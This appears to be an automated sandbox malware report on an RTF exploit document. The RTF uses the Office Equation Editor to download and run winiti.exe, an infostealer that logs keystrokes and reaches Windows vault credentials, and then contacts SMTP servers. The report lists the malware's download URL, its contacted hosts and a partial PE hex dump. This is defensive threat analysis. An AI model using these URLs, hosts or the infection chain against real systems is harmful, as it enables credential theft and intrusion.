Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 198.46.174.139:80
Source: global traffic	TCP traffic: 198.46.174.139:80 -> 192.168.2.22:49163

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 04:39:08 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Thu, 25 Jul 2024 06:32:44 GMTETag: "a4000-61e0c90002b33"Accept-Ranges: bytesContent-Length: 671744Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 11 d2 a1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e0 09 00 00 40 00 00 00 00 00 00 42 fd 09 00 00 20 00 00 00 00 0a 00 00 00 40 00 00 20 00 00 00 20 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0a 00 00 20 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 fc 09 00 4f 00 00 00 00 00 0a 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 48 dd 09 00 00 20 00 00 00 e0 09 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 00 0a 00 00 20 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0a 00 00 20 00 00 00 20 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: Joe Sandbox View	IP Address: 208.91.198.143 208.91.198.143
Source: Joe Sandbox View	IP Address: 208.91.199.225 208.91.199.225

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: C:\Users\user\AppData\Roaming\winiti.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\winiti.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\winiti.exe	DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\winiti.exe	DNS query: name: api.ipify.org

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 208.91.199.224:25
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 208.91.199.225:25
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 208.91.199.223:25
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 208.91.198.143:25

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /71/winiti.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.174.139Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139
Source: unknown	TCP traffic detected without corresponding DNS query: 198.46.174.139

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B73513B2-3E0D-42E7-B536-2812A501893B}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /71/winiti.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.174.139Connection: Keep-Alive

Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: smtp.jlahuachem.com

Source: EQNEDT32.EXE, 00000002.00000002.363861169.000000000032B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.174.139/71/winiti.
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.363861169.00000000002EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.174.139/71/winiti.exe
Source: EQNEDT32.EXE, 00000002.00000002.363861169.00000000002EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.174.139/71/winiti.exej
Source: EQNEDT32.EXE, 00000002.00000002.363861169.00000000002EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.46.174.139/71/winiti.exekkC:
Source: winiti.exe, 00000006.00000002.715091782.000000000594C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: winiti.exe, 00000006.00000002.715091782.000000000594C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: winiti.exe, 00000006.00000002.714490437.0000000002358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.jlahuachem.com
Source: winiti.exe.2.dr, winiti[1].exe.2.dr	String found in binary or memory: http://tempuri.org/dxsss.xsd
Source: winiti.exe, 00000006.00000002.714490437.0000000002358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: winiti.exe, 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: winiti.exe, 00000005.00000002.375360921.0000000003489000.00000004.00000800.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714090429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: winiti.exe, 00000006.00000002.714490437.0000000002231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: winiti.exe, 00000006.00000002.715091782.0000000005920000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: winiti.exe, 00000006.00000002.714490437.0000000002280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash

Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.22:49164 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 5.2.winiti.exe.3489570.4.raw.unpack, SKTzxzsJw.cs	.Net Code: agneM
Source: 5.2.winiti.exe.34c5b90.7.raw.unpack, SKTzxzsJw.cs	.Net Code: agneM

System Summary

Malicious sample detected (through community Yara rule)

Source: 2FBexXRCHR.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 5.2.winiti.exe.34c5b90.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.winiti.exe.3489570.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.winiti.exe.34c5b90.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.winiti.exe.3489570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\winiti.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 5_2_00190508	5_2_00190508
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 5_2_0019D0D0	5_2_0019D0D0
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 5_2_0019117E	5_2_0019117E
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 5_2_0019D508	5_2_0019D508
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 5_2_0019D9F0	5_2_0019D9F0
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 5_2_0019D9E1	5_2_0019D9E1
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 5_2_0019CC98	5_2_0019CC98
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 5_2_0019DE28	5_2_0019DE28
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_002DC050	6_2_002DC050
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_002D3908	6_2_002D3908
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_002DF358	6_2_002DF358
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_002D4520	6_2_002D4520
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_002D3C45	6_2_002D3C45
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_002D3C50	6_2_002D3C50
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_00726560	6_2_00726560
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_00725609	6_2_00725609
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_0072B640	6_2_0072B640
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_00721A48	6_2_00721A48
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_0072B280	6_2_0072B280
Source: C:\Users\user\AppData\Roaming\winiti.exe	Code function: 6_2_00728790	6_2_00728790

Source: 2FBexXRCHR.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 5.2.winiti.exe.34c5b90.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.winiti.exe.3489570.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.winiti.exe.34c5b90.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.winiti.exe.3489570.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: winiti[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: winiti.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5.2.winiti.exe.3489570.4.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.winiti.exe.3489570.4.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.winiti.exe.3489570.4.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.winiti.exe.3489570.4.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.winiti.exe.3489570.4.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.winiti.exe.3489570.4.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.winiti.exe.3489570.4.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.winiti.exe.3489570.4.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: 5.2.winiti.exe.37cc870.5.raw.unpack, X1lGeNtrqa9RypnK1A.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.winiti.exe.384a690.6.raw.unpack, wY0JxeJBuhumsKEEdp.cs	Security API names: _0020.SetAccessControl
Source: 5.2.winiti.exe.384a690.6.raw.unpack, wY0JxeJBuhumsKEEdp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.winiti.exe.384a690.6.raw.unpack, wY0JxeJBuhumsKEEdp.cs	Security API names: _0020.AddAccessRule
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, wY0JxeJBuhumsKEEdp.cs	Security API names: _0020.SetAccessControl
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, wY0JxeJBuhumsKEEdp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, wY0JxeJBuhumsKEEdp.cs	Security API names: _0020.AddAccessRule
Source: 5.2.winiti.exe.52e0000.8.raw.unpack, X1lGeNtrqa9RypnK1A.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.winiti.exe.384a690.6.raw.unpack, X1lGeNtrqa9RypnK1A.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, wY0JxeJBuhumsKEEdp.cs	Security API names: _0020.SetAccessControl
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, wY0JxeJBuhumsKEEdp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.winiti.exe.37cc870.5.raw.unpack, wY0JxeJBuhumsKEEdp.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winRTF@7/9@4/6

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$BexXRCHR.rtf

Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\winiti.exe	Mutant created: \Sessions\1\BaseNamedObjects\nDULVUQYKBSQmTmUguHVQEG

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR83BF.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\winiti.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\winiti.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 2FBexXRCHR.rtf	Virustotal: Detection: 52%
Source: 2FBexXRCHR.rtf	ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
Source: C:\Users\user\AppData\Roaming\winiti.exe	Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"	Jump to behavior
